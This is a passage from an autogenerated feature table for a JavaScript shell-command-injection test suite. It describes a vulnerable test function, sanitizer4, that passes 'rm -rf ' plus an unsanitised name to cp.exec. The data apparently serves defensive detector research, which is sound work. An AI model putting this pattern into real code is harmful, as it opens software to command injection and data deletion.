name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:19:536:19 | 0 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:19:536:19 | 0 | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:19:536:19 | 0 | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:19:536:19 | 0 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:6:537:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:6:537:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:6:537:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:6:537:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:6:537:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:11:537:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:23:537:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:23:537:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:23:537:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:23:537:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:23:537:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:23:537:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp 